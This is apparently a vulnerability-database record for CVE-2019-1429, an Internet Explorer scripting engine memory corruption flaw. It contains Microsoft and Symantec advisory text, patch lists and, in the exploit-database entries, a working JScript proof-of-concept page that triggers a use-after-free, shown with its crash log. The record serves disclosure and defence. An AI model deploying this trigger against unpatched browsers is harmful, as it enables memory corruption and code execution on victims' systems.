ID MS:CVE-2019-1429 Type mscve Reporter Microsoft Modified 2019-11-12T08:00:00
Description
A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.
In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.
The security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.
{"id": "MS:CVE-2019-1429", "bulletinFamily": "microsoft", "title": "Scripting Engine Memory Corruption Vulnerability", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.\n", "published": "2019-11-12T08:00:00", "modified": "2019-11-12T08:00:00", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1429", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2019-1429"], "type": "mscve", "lastseen": "2020-08-07T11:48:29", "history": [{"bulletin": {"bulletinFamily": "microsoft", "cvelist": ["CVE-2019-1429"], "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "description": "A remote code execution vulnerability exists in the way that the scripting\nengine handles objects in memory in Internet Explorer. The vulnerability could\ncorrupt memory in such a way that an attacker could execute arbitrary code in\nthe context of the current user. An attacker who successfully exploited the\nvulnerability could gain the same user rights as the current user. If the\ncurrent user is logged on with administrative user rights, an attacker who\nsuccessfully exploited the vulnerability could take control of an affected\nsystem. An attacker could then install programs; view, change, or delete data;\nor create new accounts with full user rights.\n\nIn a web-based attack scenario, an attacker could host a specially crafted\nwebsite that is designed to exploit the vulnerability through Internet\nExplorer and then convince a user to view the website. An attacker could also\nembed an ActiveX control marked \"safe for initialization\" in an application or\nMicrosoft Office document that hosts the IE rendering engine. The attacker\ncould also take advantage of compromised websites and websites that accept or\nhost user-provided content or advertisements. These websites could contain\nspecially crafted content that could exploit the vulnerability.\n\nThe security update addresses the vulnerability by modifying how the scripting\nengine handles objects in memory.\n\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2020-04-22T10:26:34", "references": [{"idList": ["KREBS:F5ECCD2DD57FDBC0A6062FA0AB5371FB"], "type": "krebs"}, {"idList": ["QUALYSBLOG:91FCE9434FEBAD3E701C317530323FD6"], "type": "qualysblog"}, {"idList": ["CVE-2019-1429"], "type": "cve"}, {"idList": ["SMB_NT_MS19_NOV_4525235.NASL", "SMB_NT_MS19_NOV_4525236.NASL", "SMB_NT_MS19_NOV_INTERNET_EXPLORER.NASL", "SMB_NT_MS19_NOV_4525232.NASL", "SMB_NT_MS19_NOV_4525243.NASL", "SMB_NT_MS19_NOV_4525246.NASL", "SMB_NT_MS19_NOV_4524570.NASL", "SMB_NT_MS19_NOV_4525241.NASL", "SMB_NT_MS19_NOV_4525234.NASL", "SMB_NT_MS19_NOV_4523205.NASL"], "type": "nessus"}, {"idList": ["EDB-ID:47707"], "type": "exploitdb"}, {"idList": ["OPENVAS:1361412562310815839", "OPENVAS:1361412562310815720", "OPENVAS:1361412562310815836", "OPENVAS:1361412562310815837", "OPENVAS:1361412562310815835", "OPENVAS:1361412562310815834", "OPENVAS:1361412562310815722"], "type": "openvas"}, {"idList": ["SMNTC-110727"], "type": "symantec"}, {"idList": ["TALOSBLOG:D617C7EFD22C4CD2ECFE1B030BD80B0E"], "type": "talosblog"}, {"idList": ["SECURELIST:78C1216872C5187377E9C874AEDF73FC"], "type": "securelist"}, {"idList": ["AKB:0D37CA24-1A96-4579-9FDE-ACADB531AEFE"], "type": "attackerkb"}, {"idList": ["PACKETSTORM:155433"], "type": "packetstorm"}, {"idList": ["THREATPOST:C63BDB5BFB4AECB9F2F95F69E238122B", "THREATPOST:5293ED4A454EC6487F8AA9DB9A0FF180"], "type": "threatpost"}, {"idList": ["1337DAY-ID-33561"], "type": "zdt"}], "rev": 2}, "score": {"modified": "2020-04-22T10:26:34", "rev": 2, "value": 7.4, "vector": "NONE"}}, "hash": "8c833cedb2701dc4099e1adf544da167f3aa157e621c8920fbfa7a53b31e055f", "hashmap": [{"hash": "140864078aeca1c7c35b4beb33c53c34", "key": "reporter"}, {"hash": "7a08641260e0e0b66f7aab1aed92b154", "key": "description"}, {"hash": "5f532a3fc4f1ea403f37070f59a7a53a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "msrc"}, {"hash": "f59f526efaaab7e1b223c84442e0b39a", "key": "title"}, {"hash": "ed80408f65b06df34ed6dfdb743af507", "key": "cvss"}, {"hash": "3c6387b5e0426d3dce1f8ad2aa42aaee", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "22e08ff4ed973a2d032f3e0bb9707598", "key": "mscve"}, {"hash": "fb2c6a4314ccd7b62c42d28f5801ac4c", "key": "kbList"}, {"hash": "0f2375ee559f95d98820ca722d8cd0a8", "key": "href"}, {"hash": "a8716076ca6833c0eaa4256dcf4bc62f", "key": "type"}, {"hash": "da8ce04e1c38963fc859e0cbb23f429a", "key": "modified"}, {"hash": "da8ce04e1c38963fc859e0cbb23f429a", "key": "published"}, {"hash": "695b32556f21033a27a662a41106036f", "key": "msAffectedSoftware"}], "history": [], "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1429", "id": "MS:CVE-2019-1429", "kbList": ["KB4520002", "KB4525243", "KB4519974", "KB4525106", "KB4520007", "KB4525236", "KB4519998", "KB4519976", "KB4520005", "KB4525241", "KB4520011", "KB4525246", "KB4524570", "KB4525232", "KB4525235", "KB4523205", "KB4520008", "KB4519338", "KB4520004", "KB4517389", "KB4525234", "KB4525237"], "lastseen": "2020-04-22T10:26:34", "modified": "2019-11-12T08:00:00", "msAffectedSoftware": [{"kb": "KB4525246", "kbSupersedence": "KB4520007", "msplatform": "Windows Server 2012", "name": "Internet Explorer 10"}, {"kb": "KB4525236", "kbSupersedence": "KB4519998", "msplatform": "Windows 10 Version 1607 for 32-bit Systems", "name": "Internet Explorer 11"}, {"kb": "KB4525243", "kbSupersedence": "KB4520005", "msplatform": "Windows RT 8.1", "name": "Internet Explorer 11"}, {"kb": "KB4525232", "kbSupersedence": "KB4520011", "msplatform": "Windows 10 for x64-based Systems", "name": "Internet Explorer 11"}, {"kb": "KB4525237", "kbSupersedence": "KB4520008", "msplatform": "Windows 10 Version 1803 for ARM64-based Systems", "name": "Internet Explorer 11"}, {"kb": "KB4525236", "kbSupersedence": "KB4519998", "msplatform": "Windows 10 Version 1607 for x64-based Systems", "name": "Internet Explorer 11"}, {"kb": "KB4525235", "kbSupersedence": "KB4519976", "msplatform": "Windows 7 for x64-based Systems Service Pack 1", "name": "Internet Explorer 11"}, {"kb": "KB4525106", "kbSupersedence": "KB4519974", "msplatform": "Windows Server 2012", "name": "Internet Explorer 11"}, {"kb": "KB4525235", "kbSupersedence": "KB4519976", "msplatform": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "name": "Internet Explorer 11"}, {"kb": "KB4525237", "kbSupersedence": "KB4520008", "msplatform": "Windows 10 Version 1803 for 32-bit Systems", "name": "Internet Explorer 11"}, {"kb": "KB4525243", "kbSupersedence": "KB4520005", "msplatform": "Windows 8.1 for 32-bit systems", "name": "Internet Explorer 11"}, {"kb": "KB4525234", "kbSupersedence": "KB4520002", "msplatform": "Windows Server 2008 for 32-bit Systems Service Pack 2", "name": "Internet Explorer 9"}, {"kb": "KB4525241", "kbSupersedence": "KB4520004", "msplatform": "Windows 10 Version 1709 for x64-based Systems", "name": "Internet Explorer 11"}, {"kb": "KB4523205", "kbSupersedence": "KB4519338", "msplatform": "Windows 10 Version 1809 for x64-based Systems", "name": "Internet Explorer 11"}, {"kb": "KB4524570", "kbSupersedence": "KB4517389", "msplatform": "Windows 10 Version 1903 for x64-based Systems", "name": "Internet Explorer 11"}, {"kb": "KB4525243", "kbSupersedence": "KB4520005", "msplatform": "Windows 8.1 for x64-based systems", "name": "Internet Explorer 11"}, {"kb": "KB4525235", "kbSupersedence": "KB4519976", "msplatform": "Windows 7 for 32-bit Systems Service Pack 1", "name": "Internet Explorer 11"}, {"kb": "KB4525241", "kbSupersedence": "KB4520004", "msplatform": "Windows 10 Version 1709 for 32-bit Systems", "name": "Internet Explorer 11"}, {"kb": "KB4525232", "kbSupersedence": "KB4520011", "msplatform": "Windows 10 for 32-bit Systems", "name": "Internet Explorer 11"}, {"kb": "KB4525243", "kbSupersedence": "KB4520005", "msplatform": "Windows Server 2012 R2", "name": "Internet Explorer 11"}, {"kb": "KB4525237", "kbSupersedence": "KB4520008", "msplatform": "Windows 10 Version 1803 for x64-based Systems", "name": "Internet Explorer 11"}, {"kb": "KB4525241", "kbSupersedence": "KB4520004", "msplatform": "Windows 10 Version 1709 for ARM64-based Systems", "name": "Internet Explorer 11"}, {"kb": "KB4525236", "kbSupersedence": "KB4519998", "msplatform": "Windows Server 2016", "name": "Internet Explorer 11"}, {"kb": "KB4523205", "kbSupersedence": "KB4519338", "msplatform": "Windows 10 Version 1809 for ARM64-based Systems", "name": "Internet Explorer 11"}, {"kb": "KB4523205", "kbSupersedence": "KB4519338", "msplatform": "Windows Server 2019", "name": "Internet Explorer 11"}, {"kb": "KB4524570", "kbSupersedence": "KB4517389", "msplatform": "Windows 10 Version 1903 for ARM64-based Systems", "name": "Internet Explorer 11"}, {"kb": "KB4525234", "kbSupersedence": "KB4520002", "msplatform": "Windows Server 2008 for x64-based Systems Service Pack 2", "name": "Internet Explorer 9"}, {"kb": "KB4523205", "kbSupersedence": "KB4519338", "msplatform": "Windows 10 Version 1809 for 32-bit Systems", "name": "Internet Explorer 11"}, {"kb": "KB4524570", "kbSupersedence": "KB4517389", "msplatform": "Windows 10 Version 1903 for 32-bit Systems", "name": "Internet Explorer 11"}], "mscve": "CVE-2019-1429", "msrc": "", "objectVersion": "1.3", "published": "2019-11-12T08:00:00", "references": [], "reporter": "Microsoft", "title": "Scripting Engine Memory Corruption Vulnerability", "type": "mscve", "viewCount": 1}, "differentElements": ["description"], "edition": 1, "lastseen": "2020-04-22T10:26:34"}], "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "5f532a3fc4f1ea403f37070f59a7a53a"}, {"key": "cvelist", "hash": "3c6387b5e0426d3dce1f8ad2aa42aaee"}, {"key": "cvss", "hash": "ed80408f65b06df34ed6dfdb743af507"}, {"key": "description", "hash": "0bc53610c9644ec63d053212b3cfdcf8"}, {"key": "href", "hash": "0f2375ee559f95d98820ca722d8cd0a8"}, {"key": "kbList", "hash": "fb2c6a4314ccd7b62c42d28f5801ac4c"}, {"key": "modified", "hash": "da8ce04e1c38963fc859e0cbb23f429a"}, {"key": "msAffectedSoftware", "hash": "695b32556f21033a27a662a41106036f"}, {"key": "mscve", "hash": "22e08ff4ed973a2d032f3e0bb9707598"}, {"key": "msrc", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "published", "hash": "da8ce04e1c38963fc859e0cbb23f429a"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "140864078aeca1c7c35b4beb33c53c34"}, {"key": "title", "hash": "f59f526efaaab7e1b223c84442e0b39a"}, {"key": "type", "hash": "a8716076ca6833c0eaa4256dcf4bc62f"}], "hash": "add053a2f9bef9ddb1f1a0b6e6368b9e30e32f99d83565559766a98335ec818d", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2019-1429"]}, {"type": "symantec", "idList": ["SMNTC-110727"]}, {"type": "zdt", "idList": ["1337DAY-ID-33561"]}, {"type": "exploitdb", "idList": ["EDB-ID:47707"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155433"]}, {"type": "threatpost", "idList": ["THREATPOST:5293ED4A454EC6487F8AA9DB9A0FF180", "THREATPOST:C63BDB5BFB4AECB9F2F95F69E238122B"]}, {"type": "nessus", "idList": ["SMB_NT_MS19_NOV_4525235.NASL", "SMB_NT_MS19_NOV_4525243.NASL", "SMB_NT_MS19_NOV_4525241.NASL", "SMB_NT_MS19_NOV_INTERNET_EXPLORER.NASL", "SMB_NT_MS19_NOV_4523205.NASL", "SMB_NT_MS19_NOV_4525234.NASL", "SMB_NT_MS19_NOV_4524570.NASL", "SMB_NT_MS19_NOV_4525237.NASL", "SMB_NT_MS19_NOV_4525236.NASL", "SMB_NT_MS19_NOV_4525246.NASL"]}, {"type": "krebs", "idList": ["KREBS:F5ECCD2DD57FDBC0A6062FA0AB5371FB"]}, {"type": "attackerkb", "idList": ["AKB:0D37CA24-1A96-4579-9FDE-ACADB531AEFE"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:91FCE9434FEBAD3E701C317530323FD6"]}, {"type": "securelist", "idList": ["SECURELIST:78C1216872C5187377E9C874AEDF73FC"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310815839", "OPENVAS:1361412562310815722", "OPENVAS:1361412562310815834", "OPENVAS:1361412562310815837", "OPENVAS:1361412562310815720", "OPENVAS:1361412562310815836", "OPENVAS:1361412562310815835"]}, {"type": "talosblog", "idList": ["TALOSBLOG:D617C7EFD22C4CD2ECFE1B030BD80B0E"]}], "modified": "2020-08-07T11:48:29", "rev": 2}, "score": {"value": 7.4, "vector": "NONE", "modified": "2020-08-07T11:48:29", "rev": 2}, "vulnersScore": 7.4}, "objectVersion": "1.3", "kbList": ["KB4520002", "KB4525243", "KB4519974", "KB4525106", "KB4520007", "KB4525236", "KB4519998", "KB4519976", "KB4520005", "KB4525241", "KB4520011", "KB4525246", "KB4524570", "KB4525232", "KB4525235", "KB4523205", "KB4520008", "KB4519338", "KB4520004", "KB4517389", "KB4525234", "KB4525237"], "msrc": "", "mscve": "CVE-2019-1429", "msAffectedSoftware": [{"kb": "KB4525246", "kbSupersedence": "KB4520007", "msplatform": "Windows Server 2012", "name": "Internet Explorer 10"}, {"kb": "KB4525236", "kbSupersedence": "KB4519998", "msplatform": "Windows 10 Version 1607 for 32-bit Systems", "name": "Internet Explorer 11"}, {"kb": "KB4525243", "kbSupersedence": "KB4520005", "msplatform": "Windows RT 8.1", "name": "Internet Explorer 11"}, {"kb": "KB4525232", "kbSupersedence": "KB4520011", "msplatform": "Windows 10 for x64-based Systems", "name": "Internet Explorer 11"}, {"kb": "KB4525237", "kbSupersedence": "KB4520008", "msplatform": "Windows 10 Version 1803 for ARM64-based Systems", "name": "Internet Explorer 11"}, {"kb": "KB4525236", "kbSupersedence": "KB4519998", "msplatform": "Windows 10 Version 1607 for x64-based Systems", "name": "Internet Explorer 11"}, {"kb": "KB4525235", "kbSupersedence": "KB4519976", "msplatform": "Windows 7 for x64-based Systems Service Pack 1", "name": "Internet Explorer 11"}, {"kb": "KB4525106", "kbSupersedence": "KB4519974", "msplatform": "Windows Server 2012", "name": "Internet Explorer 11"}, {"kb": "KB4525235", "kbSupersedence": "KB4519976", "msplatform": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "name": "Internet Explorer 11"}, {"kb": "KB4525237", "kbSupersedence": "KB4520008", "msplatform": "Windows 10 Version 1803 for 32-bit Systems", "name": "Internet Explorer 11"}, {"kb": "KB4525243", "kbSupersedence": "KB4520005", "msplatform": "Windows 8.1 for 32-bit systems", "name": "Internet Explorer 11"}, {"kb": "KB4525234", "kbSupersedence": "KB4520002", "msplatform": "Windows Server 2008 for 32-bit Systems Service Pack 2", "name": "Internet Explorer 9"}, {"kb": "KB4525241", "kbSupersedence": "KB4520004", "msplatform": "Windows 10 Version 1709 for x64-based Systems", "name": "Internet Explorer 11"}, {"kb": "KB4523205", "kbSupersedence": "KB4519338", "msplatform": "Windows 10 Version 1809 for x64-based Systems", "name": "Internet Explorer 11"}, {"kb": "KB4524570", "kbSupersedence": "KB4517389", "msplatform": "Windows 10 Version 1903 for x64-based Systems", "name": "Internet Explorer 11"}, {"kb": "KB4525243", "kbSupersedence": "KB4520005", "msplatform": "Windows 8.1 for x64-based systems", "name": "Internet Explorer 11"}, {"kb": "KB4525235", "kbSupersedence": "KB4519976", "msplatform": "Windows 7 for 32-bit Systems Service Pack 1", "name": "Internet Explorer 11"}, {"kb": "KB4525241", "kbSupersedence": "KB4520004", "msplatform": "Windows 10 Version 1709 for 32-bit Systems", "name": "Internet Explorer 11"}, {"kb": "KB4525232", "kbSupersedence": "KB4520011", "msplatform": "Windows 10 for 32-bit Systems", "name": "Internet Explorer 11"}, {"kb": "KB4525243", "kbSupersedence": "KB4520005", "msplatform": "Windows Server 2012 R2", "name": "Internet Explorer 11"}, {"kb": "KB4525237", "kbSupersedence": "KB4520008", "msplatform": "Windows 10 Version 1803 for x64-based Systems", "name": "Internet Explorer 11"}, {"kb": "KB4525241", "kbSupersedence": "KB4520004", "msplatform": "Windows 10 Version 1709 for ARM64-based Systems", "name": "Internet Explorer 11"}, {"kb": "KB4525236", "kbSupersedence": "KB4519998", "msplatform": "Windows Server 2016", "name": "Internet Explorer 11"}, {"kb": "KB4523205", "kbSupersedence": "KB4519338", "msplatform": "Windows 10 Version 1809 for ARM64-based Systems", "name": "Internet Explorer 11"}, {"kb": "KB4523205", "kbSupersedence": "KB4519338", "msplatform": "Windows Server 2019", "name": "Internet Explorer 11"}, {"kb": "KB4524570", "kbSupersedence": "KB4517389", "msplatform": "Windows 10 Version 1903 for ARM64-based Systems", "name": "Internet Explorer 11"}, {"kb": "KB4525234", "kbSupersedence": "KB4520002", "msplatform": "Windows Server 2008 for x64-based Systems Service Pack 2", "name": "Internet Explorer 9"}, {"kb": "KB4523205", "kbSupersedence": "KB4519338", "msplatform": "Windows 10 Version 1809 for 32-bit Systems", "name": "Internet Explorer 11"}, {"kb": "KB4524570", "kbSupersedence": "KB4517389", "msplatform": "Windows 10 Version 1903 for 32-bit Systems", "name": "Internet Explorer 11"}], "scheme": null}
{"cve": [{"lastseen": "2019-11-22T12:23:30", "bulletinFamily": "NVD", "description": "A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka 'Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1426, CVE-2019-1427, CVE-2019-1428.", "modified": "2019-11-22T00:15:00", "id": "CVE-2019-1429", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-1429", "published": "2019-11-12T19:15:00", "title": "CVE-2019-1429", "type": "cve", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2019-11-13T21:21:54", "bulletinFamily": "software", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions. Internet Explorer 9, 10, and 11 are vulnerable.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2019-11-12T00:00:00", "published": "2019-11-12T00:00:00", "id": "SMNTC-110727", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/110727", "title": "Microsoft Internet Explorer Scripting Engine CVE-2019-1429 Remote Memory Corruption Vulnerability", "type": "symantec", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2019-12-04T14:26:41", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2019-11-22T00:00:00", "published": "2019-11-22T00:00:00", "id": "1337DAY-ID-33561", "href": "https://0day.today/exploit/description/33561", "title": "Internet Explorer - Use-After-Free in JScript Arguments During toJSON Callback Exploit", "type": "zdt", "sourceData": "There is a use-after-free issue in JSCript (triggerable via Internet Explorer) where the members of the 'arguments' object aren't tracked by the garbage collector during the 'toJSON' callback. Thus, during the 'toJSON' callback, it is possible to assign a variable to the 'arguments' object, have it garbage-collected (as long as it is not referenced anywhere else) and still access it later. Note that, like in some previously reported JSCript issues, this is a use-after-free on a JSCript variable (VAR structure), so in order to trigger a crash, the entire block of variables must be freed.\r\n\r\nPoC for Internet Explorer is below. I tested it on multiple Windows version with the latest security patches applied.\r\n\r\n===========================================================\r\n\r\n<!-- saved from url=(0014)about:internet -->\r\n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=8\"></meta>\r\n<script language=\"Jscript.Encode\">\r\n var spray = new Array();\r\n\r\n function F() {\r\n alert('callback');\r\n\r\n // 2. Create a bunch of objects\r\n for (var i = 0; i < 20000; i++) spray[i] = new Object();\r\n\r\n // 3. Store a reference to one of them in the arguments array\r\n // The arguments array isn't tracked by garbage collector\r\n arguments[0] = spray[5000];\r\n\r\n // 4. Delete the objects and call the garbage collector\r\n // All JSCript variables get reclaimed... \r\n for (var i = 0; i < 20000; i++) spray[i] = 1;\r\n CollectGarbage();\r\n\r\n // 5. But we still have reference to one of them in the\r\n // arguments array\r\n alert(arguments[0]);\r\n }\r\n\r\n // 1. Cause toJSON callback to fire\r\n var o = {toJSON:F}\r\n JSON.stringify(o);\r\n\r\n alert('done');\r\n\r\n</script>\r\n\r\n===========================================================\r\n\r\n\r\nDebug log:\r\n\r\n===========================================================\r\n\r\n(1cf4.154): Access violation - code c0000005 (first chance)\r\nFirst chance exceptions are reported before any exception handling.\r\nThis exception may be expected and handled.\r\neax=00000080 ebx=05ecc218 ecx=00000080 edx=00000001 esi=05f0c3c8 edi=05fb12e8\r\neip=6e25f52a esp=05ecc180 ebp=05ecc1b4 iopl=0 nv up ei pl zr na pe nc\r\ncs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246\r\njscript!PrepareInvoke+0x12a:\r\n6e25f52a 0fb707 movzx eax,word ptr [edi] ds:002b:05fb12e8=????\r\n\r\n0:009> k\r\n # ChildEBP RetAddr \r\n00 05ecc1b4 6e262b75 jscript!PrepareInvoke+0x12a\r\n01 05ecc2a8 6e2660ee jscript!VAR::InvokeByDispID+0x1c5\r\n02 05ecc4a0 6e26244a jscript!CScriptRuntime::Run+0x2e4e\r\n03 05ecc594 6e2622a1 jscript!ScrFncObj::CallWithFrameOnStack+0xaa\r\n04 05ecc5ec 6e25bec9 jscript!ScrFncObj::Call+0x81\r\n05 05ecc68c 6e262aed jscript!NameTbl::InvokeInternal+0x399\r\n06 05ecc78c 6e2a862c jscript!VAR::InvokeByDispID+0x13d\r\n07 05ecc800 6e2a8c2e jscript!GCProtectKeyAndCall+0xed\r\n08 05ecc898 6e2a93ce jscript!JSONApplyFilters+0x125\r\n09 05ecc90c 6e2ad9a2 jscript!JSONStringifyObject+0xac\r\n0a 05ecc9b4 6e269e3a jscript!JsJSONStringify+0x382\r\n0b 05ecca1c 6e25bec9 jscript!NatFncObj::Call+0xea\r\n0c 05eccabc 6e25e476 jscript!NameTbl::InvokeInternal+0x399\r\n0d 05eccc78 6e262aa5 jscript!VAR::InvokeByName+0x8f6\r\n0e 05eccd70 6e2660ee jscript!VAR::InvokeByDispID+0xf5\r\n0f 05eccf68 6e26244a jscript!CScriptRuntime::Run+0x2e4e\r\n10 05ecd05c 6e2622a1 jscript!ScrFncObj::CallWithFrameOnStack+0xaa\r\n11 05ecd0b4 6e257124 jscript!ScrFncObj::Call+0x81\r\n12 05ecd170 6e257f75 jscript!CSession::Execute+0x314\r\n13 05ecd1d0 6e256c83 jscript!COleScript::ExecutePendingScripts+0x2d5\r\n14 05ecd274 6e2569b9 jscript!COleScript::ParseScriptTextCore+0x2c3\r\n15 05ecd2a0 70209251 jscript!COleScript::ParseScriptText+0x29\r\n16 05ecd2d8 70122a27 MSHTML!CActiveScriptHolder::ParseScriptText+0x51\r\n17 05ecd348 70121fe2 MSHTML!CScriptCollection::ParseScriptText+0x182\r\n18 05ecd434 701226ee MSHTML!CScriptData::CommitCode+0x312\r\n19 05ecd4b0 7012153a MSHTML!CScriptData::Execute+0x1ba\r\n1a 05ecd4d0 701e99b6 MSHTML!CHtmScriptParseCtx::Execute+0xaa\r\n1b 05ecd524 70159c7d MSHTML!CHtmParseBase::Execute+0x186\r\n1c 05ecd544 70159599 MSHTML!CHtmPost::Broadcast+0xfd\r\n1d 05ecd66c 7017647d MSHTML!CHtmPost::Exec+0x339\r\n1e 05ecd68c 70176376 MSHTML!CHtmPost::Run+0x3d\r\n1f 05ecd6ac 70176308 MSHTML!PostManExecute+0x60\r\n20 05ecd6c0 70176279 MSHTML!PostManResume+0x6f\r\n21 05ecd6f0 70208447 MSHTML!CHtmPost::OnDwnChanCallback+0x39\r\n22 05ecd708 7015be1d MSHTML!CDwnChan::OnMethodCall+0x27\r\n23 05ecd780 702f1207 MSHTML!GlobalWndOnMethodCall+0x1bd\r\n24 05ecd7d0 7015c5a2 MSHTML!GlobalWndProc_SEH+0x317\r\n25 05ecd7ec 7562624b MSHTML!GlobalWndProc+0x52\r\n26 05ecd818 756174dc USER32!_InternalCallWinProc+0x2b\r\n27 05ecd8fc 7561661b USER32!UserCallWinProcCheckWow+0x3ac\r\n28 05ecd970 756163f0 USER32!DispatchMessageWorker+0x21b\r\n29 05ecd97c 717e6456 USER32!DispatchMessageW+0x10\r\n2a 05ecfb0c 717e73e3 IEFRAME!CTabWindow::_TabWindowThreadProc+0xa36\r\n2b 05ecfbcc 7223df6c IEFRAME!LCIETab_ThreadProc+0x403\r\n2c 05ecfbe4 7130289d msIso!_IsoThreadProc_WrapperToReleaseScope+0x1c\r\n2d 05ecfc1c 75520419 IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x8d\r\n2e 05ecfc2c 7789662d KERNEL32!BaseThreadInitThunk+0x19\r\n2f 05ecfc88 778965fd ntdll!__RtlUserThreadStart+0x2f\r\n30 05ecfc98 00000000 ntdll!_RtlUserThreadStart+0x1b\r\n\r\n===========================================================\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/33561"}], "exploitdb": [{"lastseen": "2019-11-22T12:27:24", "bulletinFamily": "exploit", "description": "", "modified": "2019-11-22T00:00:00", "published": "2019-11-22T00:00:00", "id": "EDB-ID:47707", "href": "https://www.exploit-db.com/exploits/47707", "type": "exploitdb", "title": "Internet Explorer - Use-After-Free in JScript Arguments During toJSON Callback", "sourceData": "There is a use-after-free issue in JSCript (triggerable via Internet Explorer) where the members of the 'arguments' object aren't tracked by the garbage collector during the 'toJSON' callback. Thus, during the 'toJSON' callback, it is possible to assign a variable to the 'arguments' object, have it garbage-collected (as long as it is not referenced anywhere else) and still access it later. Note that, like in some previously reported JSCript issues, this is a use-after-free on a JSCript variable (VAR structure), so in order to trigger a crash, the entire block of variables must be freed.\r\n\r\nPoC for Internet Explorer is below. I tested it on multiple Windows version with the latest security patches applied.\r\n\r\n===========================================================\r\n\r\n<!-- saved from url=(0014)about:internet -->\r\n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=8\"></meta>\r\n<script language=\"Jscript.Encode\">\r\n var spray = new Array();\r\n\r\n function F() {\r\n alert('callback');\r\n\r\n // 2. Create a bunch of objects\r\n for (var i = 0; i < 20000; i++) spray[i] = new Object();\r\n\r\n // 3. Store a reference to one of them in the arguments array\r\n // The arguments array isn't tracked by garbage collector\r\n arguments[0] = spray[5000];\r\n\r\n // 4. Delete the objects and call the garbage collector\r\n // All JSCript variables get reclaimed... \r\n for (var i = 0; i < 20000; i++) spray[i] = 1;\r\n CollectGarbage();\r\n\r\n // 5. But we still have reference to one of them in the\r\n // arguments array\r\n alert(arguments[0]);\r\n }\r\n\r\n // 1. Cause toJSON callback to fire\r\n var o = {toJSON:F}\r\n JSON.stringify(o);\r\n\r\n alert('done');\r\n\r\n</script>\r\n\r\n===========================================================\r\n\r\n\r\nDebug log:\r\n\r\n===========================================================\r\n\r\n(1cf4.154): Access violation - code c0000005 (first 